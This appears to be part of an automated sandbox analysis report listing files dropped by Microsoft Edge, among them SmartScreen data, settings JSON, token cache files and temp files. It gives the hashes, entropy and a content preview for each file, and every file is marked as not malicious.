SHA1:	08E17AEB4D4066AC034207420F1F73DD8BE3FAA0
SHA-256:	21EE7A30C2409E0041CDA6C04EEE72688EB92FE995DC94487FF93AD32BD8F849
SHA-512:	94FC142B3CC4844BF2C0A72BCE57363C554356C799F6E581AA3012E48375F02ABD820076A8C2902A3C6BE6AC4D8FA8D4F010D4FF261327E878AF5E5EE31038FB
Malicious:	false
Preview:	edgeSettings_2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\edgeSettings_2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	130439
Entropy (8bit):	3.80180718117079
Encrypted:	false
SSDEEP:	1536:RlIyFAMrwvaGbyLWzDr6PDofI8vsUnPRLz+PMh:weWGP7Eh
MD5:	EB75CEFFE37E6DF9C171EE8380439EDA
SHA1:	F00119BA869133D64E4F7F0181161BD47968FA23
SHA-256:	48B11410DC937A1723BF4C5AD33ECDB286D8EC69544241BC373F753E64B396C1
SHA-512:	044C5113D877CE2E3B42CF07670620937ED7BE2D8B3BF2BAB085C43EF4F64598A7AC56328DDBBE7F0F3CFB9EA49D38CA332BB4ECBFEDBE24AE53B14334A30C8E
Malicious:	false
Preview:	{.. "geoidMaps": {.. "au": "https://australia.smartscreen.microsoft.com/",.. "ch": "https://switzerland.smartscreen.microsoft.com/",.. "eu": "https://europe.smartscreen.microsoft.com/",.. "ffl4": "https://unitedstates1.ss.wd.microsoft.us/",.. "ffl4mod": "https://unitedstates4.ss.wd.microsoft.us/",.. "ffl5": "https://unitedstates2.ss.wd.microsoft.us/",.. "in": "https://india.smartscreen.microsoft.com/",.. "test": "https://eu-9.smartscreen.microsoft.com/",.. "uk": "https://unitedkingdom.smartscreen.microsoft.com/",.. "us": "https://unitedstates.smartscreen.microsoft.com/",.. "gw_au": "https://australia.smartscreen.microsoft.com/",.. "gw_ch": "https://switzerland.smartscreen.microsoft.com/",.. "gw_eu": "https://europe.smartscreen.microsoft.com/",.. "gw_ffl4": "https://unitedstates1.ss.wd.microsoft.us/",.. "gw_ffl4mod": "https://unitedstates4.ss.wd.microsoft.us/",.. "gw_ffl5": "https://unitedstates2.ss.wd.microsoft.us/",.. "gw_in": "https

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\synchronousLookupUris

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	40
Entropy (8bit):	4.346439344671015
Encrypted:	false
SSDEEP:	3:kfKbUPVXXMVQX:kygV5
MD5:	6A3A60A3F78299444AACAA89710A64B6
SHA1:	2A052BF5CF54F980475085EEF459D94C3CE5EF55
SHA-256:	61597278D681774EFD8EB92F5836EB6362975A74CEF807CE548E50A7EC38E11F
SHA-512:	C5D0419869A43D712B29A5A11DC590690B5876D1D95C1F1380C2F773CA0CB07B173474EE16FE66A6AF633B04CC84E58924A62F00DCC171B2656D554864BF57A4
Malicious:	false
Preview:	synchronousLookupUris_638343870221005468

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\synchronousLookupUris_638343870221005468

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	57
Entropy (8bit):	4.556488479039065
Encrypted:	false
SSDEEP:	3:GSCIPPlzYxi21goD:bCWBYx99D
MD5:	3A05EAEA94307F8C57BAC69C3DF64E59
SHA1:	9B852B902B72B9D5F7B9158E306E1A2C5F6112C8
SHA-256:	A8EF112DF7DAD4B09AAA48C3E53272A2EEC139E86590FD80E2B7CBD23D14C09E
SHA-512:	6080AEF2339031FAFDCFB00D3179285E09B707A846FD2EA03921467DF5930B3F9C629D37400D625A8571B900BC46021047770BAC238F6BAC544B48FB3D522FB0
Malicious:	false
Preview:	9.......murmur3.............,M.h...Z...8.\..<&Li.H..[.?m

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\topTraffic

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	29
Entropy (8bit):	4.030394788231021
Encrypted:	false
SSDEEP:	3:0xXeZUSXkcVn:0Re5kcV
MD5:	52E2839549E67CE774547C9F07740500
SHA1:	B172E16D7756483DF0CA0A8D4F7640DD5D557201
SHA-256:	F81B7B9CE24F5A2B94182E817037B5F1089DC764BC7E55A9B0A6227A7E121F32
SHA-512:	D80E7351E4D83463255C002D3FDCE7E5274177C24C4C728D7B7932D0BE3EBCFEB68E1E65697ED5E162E1B423BB8CDFA0864981C4B466D6AD8B5E724D84B4203B
Malicious:	false
Preview:	topTraffic_638004170464094982

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\topTraffic_170540185939602997400506234197983529371

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	575056
Entropy (8bit):	7.999649474060713
Encrypted:	true
SSDEEP:	12288:fXdhUG0PlM/EXEBQlbk19RrH76Im4u8C1jJodha:Ji80e9Rb7Tm4u8CnR
MD5:	BE5D1A12C1644421F877787F8E76642D
SHA1:	06C46A95B4BD5E145E015FA7E358A2D1AC52C809
SHA-256:	C1CE928FBEF4EF5A4207ABAFD9AB6382CC29D11DDECC215314B0522749EF6A5A
SHA-512:	FD5B100E2F192164B77F4140ADF6DE0322F34D7B6F0CF14AED91BACAB18BB8F195F161F7CF8FB10651122A598CE474AC4DC39EDF47B6A85C90C854C2A3170960
Malicious:	false
Preview:	...._+jE.`..}....S..1....G}s..E....y".Wh.^.W.H...-...#.A...KR...9b........>k......bU.IVo...D......Y..[l.yx.......'c=..I0.....E.d...-...1 ....m../C...OQ.........qW..<:N.....38.u..X-..s....<..U.,Mi..._.......`.Y/.........^..,.E..........j@..G8..N.... ..Ea...4.+.79k.!T.-5W..!..@+..!.P..LDG.....V."....L.... .(#..$..&......C.....%A.T}....K_.S..'Q.".d....s....(j.D!......Ov..)d0)."(..%..-..G..L.}....i.....m9;.....t.w..0....f?..-..M.c.3.....N7K.T..D>.3.x...z..u$5!..4..T.....U.O^L{.5..=E..'..;.}(\|.6.:..f!.>...?M.8......P.D.J.I4.<....y.E....>....i%.6..Y.@..n.....M..r..C.f.;..<..0.H...F....h.......HB1]1....u..:...H..k....B.Q..J...@}j~.#...'Y.J~....I...ub.&..L[z..1.W/.Ck....M.......[.......N.F..z.{nZ~d.V.4.u.K.V.......X.<p..cz..>....X...W..da3(..g..Z$.L4.j=~.p.l.\.[e.&&.Y ...U)..._.^r0.,.{_......`S..[....(.\..p.bt.g..%.$+....f.....d....Im..f...W ......G..i_8a..ae..7....pS.....z-H..A.s.4.3..O.r.....u.S......a.}..v.-/..... ...a.x#./:...sS&U.().xL...pg

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\topTraffic_638004170464094982

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	raw G3 (Group 3) FAX, byte-padded
Category:	dropped
Size (bytes):	460992
Entropy (8bit):	7.999625908035124
Encrypted:	true
SSDEEP:	12288:KaRwcD8XXTZGZJHXBjOVX3xFttENr4+3eGPnKvJWXrydqb:KaR5oZ2MBFt8r4+3eG/URdqb
MD5:	E9C502DB957CDB977E7F5745B34C32E6
SHA1:	DBD72B0D3F46FA35A9FE2527C25271AEC08E3933
SHA-256:	5A6B49358772DB0B5C682575F02E8630083568542B984D6D00727740506569D4
SHA-512:	B846E682427CF144A440619258F5AA5C94CAEE7612127A60E4BD3C712F8FF614DA232D9A488E27FC2B0D53FD6ACF05409958AEA3B21EA2C1127821BD8E87A5CA
Malicious:	false
Preview:	...2lI.5.<C.;.{....._+jE.`..}....-...#.A...KR...l.M0,s...).9..........x.......F.b......jU....y.h'....L<.....Z..%...._...g.4yu...........'c=..I0..........qW..<:N....<..U.,Mi..._......'(..U.9.!........u....7...4. ..Ea...4.+.79k.!T.-5W..!..@+..$..t\|1.E..7F...+..xf....z&_Q...-.B...)8R.c....0.......B.M.Z...0....&v..<..H...3.....N7K.T..D>.8......P.D.J.I4.B.H.VHy...@.Wc.Cl..6aD..j.....E..4..mI..X]2.GH.G.L...E.F.=.J...@}j~.#...'Y.L[z..1.W/.Ck....L..X........J.NYd........>...N.F..z.{nZ~d.N..../..6.\L...Q...+.w..p...>.S.iG...0]..8....S..)`B#.v..^..T.?...Z.rz.D'.!.T.w....S..8....V.4.u.K.V.......W.6s...Y.).[.c.X.S..........5.X7F...tQ....z.L.X..(3#j...8...i.[..j$.Q....0...]"W.c.H..n..2Te.ak...c..-F(..W2.b....3.]......c.d\|.../....._...f.....d....Im..g.b..R.q.<xx...i2..r.I()Iat..b.j.r@K.+5..C.....nJ.>P,.V@.....s.4.3..O.r.....smd7...L.....].u&1../t.*.......uXb...=@.....wv......]....#.{$.w......i.....\|.....?....E7...}$+..t).E.U..Q..~.`.)..Y@.6.h.......%(

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\local\uriCache

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	9
Entropy (8bit):	3.169925001442312
Encrypted:	false
SSDEEP:	3:CMzOn:CM6
MD5:	B6F7A6B03164D4BF8E3531A5CF721D30
SHA1:	A2134120D4712C7C629CDCEEF9DE6D6E48CA13FA
SHA-256:	3D6F3F8F1456D7CE78DD9DFA8187318B38E731A658E513F561EE178766E74D39
SHA-512:	4B473F45A5D45D420483EA1D9E93047794884F26781BBFE5370A554D260E80AD462E7EEB74D16025774935C3A80CBB2FD1293941EE3D7B64045B791B365F2B63
Malicious:	false
Preview:	uriCache_

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\local\uriCache_

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	179
Entropy (8bit):	5.0186897625635085
Encrypted:	false
SSDEEP:	3:YTyLSmafBoTfIeRDHtDozRLuLgfGBkGAeekVy8HfzXNPIAclTJiR9VYn:YWLSGTt1o9LuLgfGBPAzkVj/T8l87y
MD5:	84BABBF9170CF735109CB8E2904543D9
SHA1:	6CF1C84BF0A01936CC5DA3B92283EB24B887BF45
SHA-256:	70563EB847424203E5B170A3CCF2A574C465278EFF4F1C35792E5AF12AD96D37
SHA-512:	4685CD79C22BEA780282C6878C5EA771A608A5B68D6BCF6B1760F2BB98062D5337901EC5486117B93ABB2A273015B3978B678A9BE667953AAE1B5C0385A9AFAC
Malicious:	false
Preview:	{"version":1,"cache_data":[{"file_hash":"da2d278eafa98c1f","server_context":"1;f94c025f-7523-6972-b613-ce2c246c55ce;unkn:100;0.01","result":1,"expiration_time":1736530951444181}]}

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Variations

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	86
Entropy (8bit):	4.3751917412896075
Encrypted:	false
SSDEEP:	3:YQ3JYq9xSs0dMEJAELJ2rjozQw:YQ3Kq9X0dMgAEwj2
MD5:	16B7586B9EBA5296EA04B791FC3D675E
SHA1:	8890767DD7EB4D1BEAB829324BA8B9599051F0B0
SHA-256:	474D668707F1CB929FEF1E3798B71B632E50675BD1A9DCEAAB90C9587F72F680
SHA-512:	58668D0C28B63548A1F13D2C2DFA19BCC14C0B7406833AD8E72DFC07F46D8DF6DED46265D74A042D07FBC88F78A59CB32389EF384EC78A55976DFC2737868771
Malicious:	false
Preview:	{"user_experience_metrics.stability.exited_cleanly":false,"variations_crash_streak":2}

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\c653e449-3d15-49a0-a904-a4834bf057e7.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	46005
Entropy (8bit):	6.088698441307419
Encrypted:	false
SSDEEP:	768:QMkbJrT8IeQc5dXFVLmZQhVIFtUPI9N2aPEC1oOwWE7RTupzKscDX//Nqf:QMk1rT8H1XO98aPEIoOoRTuik
MD5:	412A78A98A410D02837B685328B07E3C
SHA1:	813E806F6F5273C15741CFE957B188B2243CB9AD
SHA-256:	AB4C760357303393D376A8AEB20CE95C972AF40473C914C69C3DD9A475755366
SHA-512:	4FBAB258E541F249B85E4F6A54BE00A5C948A70D0E6F0E9FFF81A4DB2A611D48C8D7D4B36904D9B59E3C80B03329B0FACE5F732F3A67969A36392FDB0119AF85
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"5E25271B8190D943537AD3FDB50874FC133E8B4A00380E2A6A888D63386F728B\"","browser":{"browser_build_version":"117.0.2045.47","browser_version_of_last_seen_whats_new":"117.0.2045.47","last_seen_whats_new_page_version":"117.0.2045.47"},"continuous_migration":{"local_guid":"07b23afb-84f8-4bcd-aacb-154279a25749"},"desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"desktop_session_duration_tracker":{"last_session_end_timestamp":"1736430153"},"domain_actions_config":"H4sIAAAAAAAAAL1dWZPktpH+KxP9ZDtU6GMujfykHY9txVpHyHIoYh2ODhBEkWiCAAdHVbEc/u+bCVb1dE8RqEqOdh806mbzw8VEXshM/PuKb27vha2luF9LHqKT96KVoru3G+mcquXVN/++4sOgleBBWeOvvvnn4YGs7wcLz8erb65+HMKPMVx9dVXbnisDT4wMa612TNj+6j9fUSA+xFpZPyH/9dVVQig59Wx4L5+Cwzjg799ubt/jJP48zeE9TuHwDjYBc/Ew+Ktvbv/z1ZWoe+rsjB4/7Abr5U+ajz9LXo9Px+21Mk1hoo/oX6HHjTLyKTjYyMJmCbLnO/hZMpjFAjSvxOIhbxgi5FK85m+ZCkuQu7UyKoxLO97yIFoYvbAluiw2oRoYgIQ2nG2AqJY2U+koRXQbbMm3fMs

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\d1ecf3d9-34c7-4aa5-937a-2d8b34a66c41.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	44637
Entropy (8bit):	6.096861891491217
Encrypted:	false
SSDEEP:	768:zDXzgWPsj/qlGJqIY8GB4krMLmZ+2VCaFVVKwWE7RTupzKscDX//NPC1os:z/Ps+wsI7ynRKoRTuiVIos
MD5:	C2FAED19D3BD0D85DF6BCF1A9D056F83
SHA1:	20AFCDCBF076DE61975001920C2D4B9A2B12DC00
SHA-256:	6AD935644E2B656C0BF05CE0896AC700D60AF308423454228451A15F0C538955
SHA-512:	AB6421056B9DC5E8F7138A11637B972DDF39AC021D2326646FDC458FDE9A43C31F322445838AE1B839B073BB7359515B3DC797FA1328E6FB630CA040EE2FE7F9
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\e02da981-89b8-4947-b4a6-22ea284b6f6f.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	46082
Entropy (8bit):	6.08859236864733
Encrypted:	false
SSDEEP:	768:QMkbJrT8IeQc52XFVLmZ4hVIFtUPI9N2aPEC1oOwWE7RTupzKscDX//Nqf:QMk1rT8HeXa98aPEIoOoRTuik
MD5:	CD3C18A3163A7E769471400EA291A7E1
SHA1:	A36F7DF8E0F7690BAA6AA28398B33394B724C852
SHA-256:	9184D481212109BFDD7DDCCB2B60A9031B1FA9F9696C38817D33209405F3D9CD
SHA-512:	6A7AA394A45D114F64408352045AC193B71EC09FEB275655C778E0046F8E4546DFF7786EB57E226EF5A2E39B65A1E1332DE217CDD16D159164607D264267B0D5
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"5E25271B8190D943537AD3FDB50874FC133E8B4A00380E2A6A888D63386F728B\"","browser":{"browser_build_version":"117.0.2045.47","browser_version_of_last_seen_whats_new":"117.0.2045.47","last_seen_whats_new_page_version":"117.0.2045.47"},"continuous_migration":{"local_guid":"07b23afb-84f8-4bcd-aacb-154279a25749"},"desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"desktop_session_duration_tracker":{"last_session_end_timestamp":"1736430153"},"domain_actions_config":"H4sIAAAAAAAAAL1dWZPktpH+KxP9ZDtU6GMujfykHY9txVpHyHIoYh2ODhBEkWiCAAdHVbEc/u+bCVb1dE8RqEqOdh806mbzw8VEXshM/PuKb27vha2luF9LHqKT96KVoru3G+mcquXVN/++4sOgleBBWeOvvvnn4YGs7wcLz8erb65+HMKPMVx9dVXbnisDT4wMa612TNj+6j9fUSA+xFpZPyH/9dVVQig59Wx4L5+Cwzjg799ubt/jJP48zeE9TuHwDjYBc/Ew+Ktvbv/z1ZWoe+rsjB4/7Abr5U+ajz9LXo9Px+21Mk1hoo/oX6HHjTLyKTjYyMJmCbLnO/hZMpjFAjSvxOIhbxgi5FK85m+ZCkuQu7UyKoxLO97yIFoYvbAluiw2oRoYgIQ2nG2AqJY2U+koRXQbbMm3fMs

C:\Users\user\AppData\Local\Microsoft\TokenBroker\Cache\5a2a7058cf8d1e56c20e6b19a7c48eb2386d141b.tbres

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	2278
Entropy (8bit):	3.8591901495095073
Encrypted:	false
SSDEEP:	48:uiTrlKxrgxgxl9Il8uGw8l0Helr+nPJu0lvxofKag/45Md1rc:mdYEl0He4nPJztxofnwg
MD5:	3FC22805AB7599DF42FEBB586A4797EA
SHA1:	45C1D836F34FF36695654A6BA1902236F8F749F0
SHA-256:	286663E3EA51CFEC5FC5A352C0279B8C7699E1B378A025A7F99AA17AA42FF130
SHA-512:	E2AB59BC37D7885359081B761B47185BE1C936D1B56D01F4507C7BF5B15C8107D791134C09D6A716907B4ECAF027ABBE9C3BD8154794879D219605B0F820A3C9
Malicious:	false
Preview:	{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".W.i.p.w.W.M.+.N.H.l.b.C.D.m.s.Z.p.8.S.O.s.j.h.t.F.B.s.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".g.K.V.J.t.q.R.i.2.w.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.A.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.C.L.w.A.x.N.

C:\Users\user\AppData\Local\Microsoft\TokenBroker\Cache\cf7513a936f7effbb38627e56f8d1fce10eb12cc.tbres

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	4622
Entropy (8bit):	3.9983577592554047
Encrypted:	false
SSDEEP:	96:jYYdIrAo247loD7JpCLCzv6NmSrOIb3S3G5:jPirvhKWmmNmSrOIJ5
MD5:	74C11E702BED32CAA269A01EC32BA38F
SHA1:	9E16405D5C701C2BF18D57090154E62DF0A8E643
SHA-256:	774D3E0176E06AB809F6DE7C13FF616B0ADD31262D0ABA3F86F393402C144546
SHA-512:	2E0F0492A67A18C6537720F9F69FB18E995564FC14C5AC050626FE345B9AD31E4A0620B041CD023375E2E972885207BA0B8D5FF70E3F0BE628AC1F1F27E3D5D9
Malicious:	false
Preview:	{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".z.3.U.T.q.T.b.3.7./.u.z.h.i.f.l.b.4.0.f.z.h.D.r.E.s.w.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".C.B.d.q.n.J.x.i.2.w.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.w.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.C.L.w.A.x.N.

C:\Users\user\AppData\Local\Microsoft\TokenBroker\Cache\e8ddd4cbd9c0504aace6ef7a13fa20d04fd52408.tbres

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	2684
Entropy (8bit):	3.910352758645589
Encrypted:	false
SSDEEP:	48:uiTrlKx68Wa7xKxl9Il8uE0/QhPCAzKP/d1QnB3MlRXkCclc00d/vc:aYYu8SzKPF1QnB3QkCvM
MD5:	31DF39F5FF92D2D23EF80B3CDA4616D6
SHA1:	D1AD17F15CE74AF1FE2A1E10F21E7841BF871F10
SHA-256:	8B6BBECD96A7FEF0E9EFAB4A23835C789B5A08FFF49183895FF2F8FCDFB50667
SHA-512:	22B6834998968520F1BB419538CA0171E42B20748AAB85E04194B3AC7BD620D07EFB2D8FA84A4082B7EF0BDDB21A4627FFF59590A101B7AAB2687157A62F7DBB
Malicious:	false
Preview:	{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".6.N.3.U.y.9.n.A.U.E.q.s.5.u.9.6.E./.o.g.0.E./.V.J.A.g.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".U.v.F.w.z.G.2.B.3.A.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.A.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.C.L.w.A.x.N.

C:\Users\user\AppData\Local\Temp\0b65dd0f-641b-474f-b761-82df4376a0b4.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:L:L
MD5:	5058F1AF8388633F609CADB75A75DC9D
SHA1:	3A52CE780950D4D969792A2559CD519D7EE8C727
SHA-256:	CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
SHA-512:	0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
Malicious:	false
Preview:	.

C:\Users\user\AppData\Local\Temp\346538b8-aeaf-42c2-aad3-7ca9544b0cbf.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	PNG image data, 50 x 50, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	1534015
Entropy (8bit):	7.9920298426116965
Encrypted:	true
SSDEEP:	24576:LNixO3GaOAC86cs72nGu0W6TQmH7msfdpg3XsxKZl+U3XM6Ov1dP9266hqLLR9E/:RiO3GaOA9SQhwdpg3CKZlJxOvHAbuVq/
MD5:	FBBD524A4B676E0DE3DDC0DF8FB946ED
SHA1:	6B67220FD4A930342586089AC114686EB75DF641
SHA-256:	20E7BDEB1E438F942960FBC2AFAAF50891E7DA4CF127D4E08EE30B852F9A3136
SHA-512:	2E6F8F4B3A4B334B9B6B0F8D7BCD9B208F38AF1D9A964F8DD3165746534D37D09D82F22D1D743D4DDBDB66E9DC2BF8EB83D09CDF3871081CBDC8B49287E5D1D2
Malicious:	false
